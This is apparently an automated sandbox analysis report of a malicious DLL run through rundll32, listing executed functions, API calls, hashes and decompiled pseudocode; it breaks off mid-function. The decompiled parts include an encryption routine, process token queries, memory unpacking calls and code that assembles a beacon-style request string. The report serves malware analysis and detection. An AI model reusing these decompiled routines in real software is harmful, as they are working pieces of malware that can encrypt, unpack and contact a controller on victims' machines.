memcpy.NTDLL(73B769A0,00DE1B37,00000002,00000000,004F0053,73B769A0,?,?,00DE1B37,004F0053,03D192FC), ref: 00DE5D81

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: 620e21aa19ac38f17cee9e708662fe661f3733c29fb204fee6dca568182f9a24
Instruction ID: 2fbe02200b68934a00aa0fde45c51c90bbf30dc77791d91bb9cd25d907aced40
Opcode Fuzzy Hash: 620e21aa19ac38f17cee9e708662fe661f3733c29fb204fee6dca568182f9a24
Instruction Fuzzy Hash: 3AF04976900118BBCF11EFA9CC85CCE7BACEF083A47054062FA08D7202E731EA148BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DE21C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03D187FA,00000000,00000000,00000000,00DE7100,00000000), ref: 00DE21D1
lstrlen.KERNEL32(?), ref: 00DE21D9

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

lstrcpy.KERNEL32(00000000,03D187FA), ref: 00DE21ED
lstrcat.KERNEL32(00000000,?), ref: 00DE21F8

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: 906649f555ce4372e6e16ce75a51073d0d2c2d3a4359d89439676e536a04690b
Instruction ID: d17f0f889ba5f0478c46187625f3310a7a993b0200ac2d03478d96d45c42e06c
Opcode Fuzzy Hash: 906649f555ce4372e6e16ce75a51073d0d2c2d3a4359d89439676e536a04690b
Instruction Fuzzy Hash: E2E012739023A5678711BBE99C88CAFFBADEF997613490416FA00D7311C724D905DBB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6644 Parent PID: 6624 rundll32.exeCOMMON

Executed Functions

Function 007939C5, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E007939C5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				void* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				void* _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				void* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x79a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x79a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00796837(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x79a0b0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x79a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E007950CA(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x007939ce
0x007939d4
0x007939d7
0x007939dd
0x007939dd
0x007939df
0x007939e1
0x007939e4
0x007939ea
0x007939eb
0x007939ec
0x007939f2
0x007939f7
0x007939fd
0x00793a05
0x00793b62
0x00793a0b
0x00793a0d
0x00793a16
0x00793a1b
0x00793a2d
0x00793a30
0x00793a34
0x00793a3b
0x00793a3f
0x00793a47
0x00793b4d
0x00793a4d
0x00793a4d
0x00793a51
0x00793a52
0x00793a54
0x00793a5f
0x00793b39
0x00793a65
0x00793a65
0x00793a68
0x00793a6e
0x00793a74
0x00793a74
0x00793a7c
0x00793a80
0x00793a83
0x00793b2a
0x00793a89
0x00793a8f
0x00793a92
0x00793a95
0x00793a97
0x00793a9a
0x00793a9d
0x00793a9f
0x00793a9f
0x00793aa9
0x00793aae
0x00793ab1
0x00793ab4
0x00793ab6
0x00793abf
0x00793ae9
0x00793ac1
0x00793ad2
0x00793ad2
0x00793af1
0x00000000
0x00000000
0x00793af3
0x00793af6
0x00793af9
0x00793afd
0x00000000
0x00793aff
0x00793b0e
0x00793b14
0x00793b1c
0x00793b1c
0x00000000
0x00793afd
0x00793b01
0x00793b09
0x00793b0c
0x00793b23
0x00000000
0x00000000
0x00000000
0x00793b0c
0x00793a83
0x00793b3c
0x00793b3f
0x00793b3f
0x00793b54
0x00793b54
0x00793b6c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00794A23,00000001,007970D9,00000000), ref: 007939FD
memcpy.NTDLL(00794A23,007970D9,00000010,?,?,?,00794A23,00000001,007970D9,00000000,?,007962B1,00000000,007970D9,?,00000000), ref: 00793A16
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00793A3F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00793A57
memcpy.NTDLL(00000000,00000000,05019630,00000010), ref: 00793AA9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05019630,00000020,?,?,00000010), ref: 00793AD2
GetLastError.KERNEL32(?,?,00000010), ref: 00793B01
GetLastError.KERNEL32 ref: 00793B33
CryptDestroyKey.ADVAPI32(00000000), ref: 00793B3F
GetLastError.KERNEL32 ref: 00793B47
CryptReleaseContext.ADVAPI32(?,00000000), ref: 00793B54
GetLastError.KERNEL32(?,?,?,00794A23,00000001,007970D9,00000000,?,007962B1,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 00793B5C

Strings

q}y, xrefs: 00793AE9

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: q}y
API String ID: 3401600162-423236950
Opcode ID: eb9e20e7a16f17eba2d1b9aea309d57a527d8592feb6edd5e1d4e8b7164d1b0e
Instruction ID: 60035e3ef6b7992e442e63e310bc1e90b3d5ab599a634ebfe12ab635f0aa9061
Opcode Fuzzy Hash: eb9e20e7a16f17eba2d1b9aea309d57a527d8592feb6edd5e1d4e8b7164d1b0e
Instruction Fuzzy Hash: C1515FB1900249FFDF10DFA9EC89AAEBBB9FB04340F108426F911E6250D7399E14DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CA7ED, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009CC,00003000,00000040,000009CC,6D4CA240), ref: 6D4CA8A7
VirtualAlloc.KERNEL32(00000000,0000009A,00003000,00000040,6D4CA29F), ref: 6D4CA8DE
VirtualAlloc.KERNEL32(00000000,00011388,00003000,00000040), ref: 6D4CA93E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4CA974
VirtualProtect.KERNEL32(6D470000,00000000,00000004,6D4CA7CC), ref: 6D4CAA79
VirtualProtect.KERNEL32(6D470000,00001000,00000004,6D4CA7CC), ref: 6D4CAAA0
VirtualProtect.KERNEL32(00000000,?,00000002,6D4CA7CC), ref: 6D4CAB6D
VirtualProtect.KERNEL32(00000000,?,00000002,6D4CA7CC,?), ref: 6D4CABC3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D4CABDF

Memory Dump Source

Source File: 00000003.00000002.925791766.000000006D4CA000.00000040.00020000.sdmp, Offset: 6D4CA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ca000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 5d46b9c5940f4ee50b30dc4771111a3df77e7e75003685d0b3268aae6c223ad0
Instruction ID: 5d8e052c685540637a97c65ced49af48894cea137a5263557ebd8d999abcec1a
Opcode Fuzzy Hash: 5d46b9c5940f4ee50b30dc4771111a3df77e7e75003685d0b3268aae6c223ad0
Instruction Fuzzy Hash: 2FD139765002019FDB25CF58C885F627BA6FF48310B194298EE099F35AEBBDAC11CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00792D06, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00792D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00796837(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E007950CA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x00792d13
0x00792d14
0x00792d15
0x00792d16
0x00792d17
0x00792d1b
0x00792d22
0x00792d31
0x00792d34
0x00792d37
0x00792d3e
0x00792d41
0x00792d44
0x00792d47
0x00792d4a
0x00792d55
0x00792d57
0x00792d60
0x00792d68
0x00792d6a
0x00792d7c
0x00792d86
0x00792d8a
0x00792d99
0x00792d9d
0x00792da6
0x00792dae
0x00792dae
0x00792db0
0x00792db0
0x00792db8
0x00792dbe
0x00792dc2
0x00792dc2
0x00792dcd

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00792D4D
NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00792D60
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00792D7C

Part of subcall function 00796837: RtlAllocateHeap.NTDLL(00000000,00000000,00794197), ref: 00796843

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00792D99
memcpy.NTDLL(00000000,00000000,0000001C), ref: 00792DA6
NtClose.NTDLL(00000000), ref: 00792DB8
NtClose.NTDLL(00000000), ref: 00792DC2

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: f5d043c2313dc832e86b36026403cf84e17e1440633be9e05378f52fc033d078
Instruction ID: cfef4ab9dbb7528681c367adf0994801bbeb790794356c3ae351610da4759f6e
Opcode Fuzzy Hash: f5d043c2313dc832e86b36026403cf84e17e1440633be9e05378f52fc033d078
Instruction Fuzzy Hash: 4721F3B2A00228FBEF01AF94DC49DDEBBBDFB08750F104066FA04E6160D7758A419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D48DCB0, Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1260COMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(6D4A4870,?,00000646), ref: 6D48DE81

Strings

e, xrefs: 6D48E0E8
w, xrefs: 6D48E07C

Memory Dump Source

Source File: 00000003.00000002.925622775.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d47e000_rundll32.jbxd

Similarity

API ID: EnvironmentVariable
String ID: e$w
API String ID: 1431749950-2396313056
Opcode ID: 8dd1e0995d8aa823e4a6845313fcea10cdcac69374076553ae5706c8d66440cd
Instruction ID: edc7a5b78cdc0b76825eda0e138f996e511ddd2b484e78d032089e8d8adb3513
Opcode Fuzzy Hash: 8dd1e0995d8aa823e4a6845313fcea10cdcac69374076553ae5706c8d66440cd
Instruction Fuzzy Hash: 7CC27A71A082518FCB04EF28C594B6ABBF1BB9A344F594A2EE485D7382D771DC05CF86

Uniqueness

Uniqueness Score: -1.00%

Function 007946D1, Relevance: 33.3, APIs: 22, Instructions: 262
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E007946D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t102;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				signed int _t122;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x79a018; // 0x5a1b6391
				asm("bswap eax");
				_t65 =  *0x79a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x79a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x79a00c; // 0x67522d90
				asm("bswap eax");
				_t68 =  *0x79a2d4; // 0x487d5a8
				_t3 = _t68 + 0x79b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x79a02c,  *0x79a004, _t63);
				_t71 = E00796A09();
				_t72 =  *0x79a2d4; // 0x487d5a8
				_t4 = _t72 + 0x79b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x79a2d4; // 0x487d5a8
					_t8 = _t139 + 0x79b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E00795040(_t144);
				_t77 =  *0x79a2d4; // 0x487d5a8
				_t10 = _t77 + 0x79b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x79a2d4; // 0x487d5a8
				_t12 = _t81 + 0x79b7aa; // 0x5018d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x79b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x79a31c; // 0x50195e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x79a2d4; // 0x487d5a8
					_t18 = _t135 + 0x79b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x79a32c; // 0x50195b0
				if(_t86 != 0) {
					_t132 =  *0x79a2d4; // 0x487d5a8
					_t20 = _t132 + 0x79b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x79a37c; // 0x5019630
				_t88 = E00792885(0x79a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x79a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x79a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x79a290, _t167, _v12);
						goto L28;
					}
					E00792DD0(GetTickCount());
					_t95 =  *0x79a37c; // 0x5019630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x79a37c; // 0x5019630
					__imp__(_t99 + 0x40);
					_t101 =  *0x79a37c; // 0x5019630
					_t102 = E0079624D(1, _t156, _t143,  *_t101); // executed
					_t163 = _t102;
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x79a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x7992ac);
					_push(_t163);
					_t107 = E007921C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x79a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E00794AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E00791492();
						L24:
						HeapFree( *0x79a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E007926C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_t122 = E0079161A(_t171, _a4, _a12, _a16); // executed
						_a20 = _t122;
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E007950CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0079580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E007950CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x007946d1
0x007946d1
0x007946d1
0x007946da
0x007946df
0x007946e6
0x007946e8
0x007946e8
0x007946f5
0x00794700
0x00794703
0x0079470e
0x00794711
0x00794716
0x00794719
0x0079471e
0x00794721
0x0079472d
0x0079473a
0x0079473c
0x00794742
0x00794747
0x00794752
0x00794754
0x00794757
0x0079475d
0x0079475f
0x00794767
0x00794772
0x00794774
0x00794777
0x00794777
0x00794779
0x00794780
0x00794785
0x00794792
0x00794794
0x00794799
0x007947a1
0x007947a4
0x007947aa
0x007947b5
0x007947b7
0x007947bc
0x007947c1
0x007947c4
0x007947c9
0x007947d4
0x007947d6
0x007947d9
0x007947d9
0x007947db
0x007947e2
0x007947e5
0x007947ea
0x007947f4
0x007947f6
0x007947f6
0x007947f9
0x00794807
0x0079480c
0x00794810
0x00794813
0x007949dd
0x007949e5
0x007949f2
0x00794819
0x00794825
0x0079482d
0x00794830
0x007949cd
0x007949d7
0x00000000
0x007949d7
0x0079483c
0x00794841
0x0079484a
0x0079485b
0x0079485f
0x00794868
0x0079486e
0x00794876
0x0079487b
0x00794882
0x0079488b
0x00794891
0x007949bd
0x007949c7
0x00000000
0x007949c7
0x0079489d
0x007948a3
0x007948a4
0x007948ab
0x007948ae
0x007949af
0x007949b7
0x00000000
0x007949b7
0x007948b7
0x007948bd
0x007948c6
0x007948cf
0x007948da
0x007948e1
0x007948e4
0x007949f5
0x00794997
0x00794997
0x0079499c
0x007949a7
0x007949ad
0x00000000
0x007949ad
0x007948ee
0x007948f5
0x007948f8
0x007948fd
0x00794908
0x0079490d
0x00794910
0x00794916
0x0079491c
0x00794922
0x00794925
0x0079492b
0x0079492e
0x00794933
0x00794937
0x00794937
0x00794943
0x0079494f
0x00794953
0x00794955
0x0079495a
0x0079495c
0x00794961
0x00794966
0x00794973
0x0079497b
0x0079497e
0x0079497e
0x0079495a
0x00000000
0x00794945
0x00794949
0x00794980
0x00794983
0x0079498c
0x00000000
0x00000000
0x00000000
0x00000000
0x0079498c
0x0079494b
0x00000000
0x0079494b
0x00794943

APIs

GetTickCount.KERNEL32 ref: 007946E8
wsprintfA.USER32 ref: 00794735
wsprintfA.USER32 ref: 00794752
wsprintfA.USER32 ref: 00794772
wsprintfA.USER32 ref: 00794790
wsprintfA.USER32 ref: 007947B3
wsprintfA.USER32 ref: 007947D4
wsprintfA.USER32 ref: 007947F4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00794825
GetTickCount.KERNEL32 ref: 00794836
RtlEnterCriticalSection.NTDLL(050195F0), ref: 0079484A
RtlLeaveCriticalSection.NTDLL(050195F0), ref: 00794868

Part of subcall function 0079624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007970D9,00000000,05019630), ref: 00796278
Part of subcall function 0079624D: lstrlen.KERNEL32(00000000,?,00000000,007970D9,00000000,05019630), ref: 00796280
Part of subcall function 0079624D: strcpy.NTDLL ref: 00796297
Part of subcall function 0079624D: lstrcat.KERNEL32(00000000,00000000), ref: 007962A2
Part of subcall function 0079624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007970D9,?,00000000,007970D9,00000000,05019630), ref: 007962BF

StrTrimA.SHLWAPI(00000000,007992AC,?,05019630), ref: 0079489D

Part of subcall function 007921C1: lstrlen.KERNEL32(050187FA,00000000,00000000,00000000,00797100,00000000), ref: 007921D1
Part of subcall function 007921C1: lstrlen.KERNEL32(?), ref: 007921D9
Part of subcall function 007921C1: lstrcpy.KERNEL32(00000000,050187FA), ref: 007921ED
Part of subcall function 007921C1: lstrcat.KERNEL32(00000000,?), ref: 007921F8

lstrcpy.KERNEL32(00000000,?), ref: 007948BD
lstrcat.KERNEL32(00000000,?), ref: 007948CF
lstrcat.KERNEL32(00000000,00000000), ref: 007948D5

Part of subcall function 00794AA6: lstrlen.KERNEL32(?,00000000,05019C98,745EC740,007913D0,05019E9D,007955DE,007955DE,?,007955DE,?,63699BC3,E8FA7DD7,00000000), ref: 00794AAD
Part of subcall function 00794AA6: mbstowcs.NTDLL ref: 00794AD6
Part of subcall function 00794AA6: memset.NTDLL ref: 00794AE8

wcstombs.NTDLL ref: 00794966

Part of subcall function 0079161A: SysAllocString.OLEAUT32(00000000), ref: 0079165B

Part of subcall function 007950CA: RtlFreeHeap.NTDLL(00000000,00000000,00794239,00000000,00000001,?,00000000,?,?,?,00796B8D,00000000,?,00000001), ref: 007950D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 007949A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 007949B7
HeapFree.KERNEL32(00000000,00000000,?,05019630), ref: 007949C7
HeapFree.KERNEL32(00000000,?), ref: 007949D7
HeapFree.KERNEL32(00000000,?), ref: 007949E5

Memory Dump Source

Source File: 00000003.00000002.923994144.0000000000791000.00000020.00000001.sdmp, Offset: 00790000, based on PE: true

Associated: 00000003.00000002.923979130.0000000000790000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924012217.0000000000799000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.924022293.000000000079A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.924031743.000000000079C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_790000_rundll32.jbxd

Similarity

API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 972889839-0
Opcode ID: 14f21beefa27b4844b0cda08e85125c6ab7ae196f8be2236c994ca9c4447814e
Instruction ID: 43f204591b643a9f342c7dbd55e32d73eb4a7fc3d82ce9b71edfa1dff81f78ce
Opcode Fuzzy Hash: 14f21beefa27b4844b0cda08e85125c6ab7ae196f8be2236c994ca9c4447814e
Instruction Fuzzy Hash: 65A14A71501119FFDF11DF68EC89EAA3BB9FB49310B148026F908C7261DB39A916CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00792022, Relevance: 16.6, APIs: 11, Instructions: 149
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00792022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				signed int _t66;
				void* _t69;
				void* _t71;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t74 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x79a298);
					_v20 = 0;
					_v16 = 0;
					L00797D8C();
					_v36.LowPart = _t46;
					_v32 = _t74;
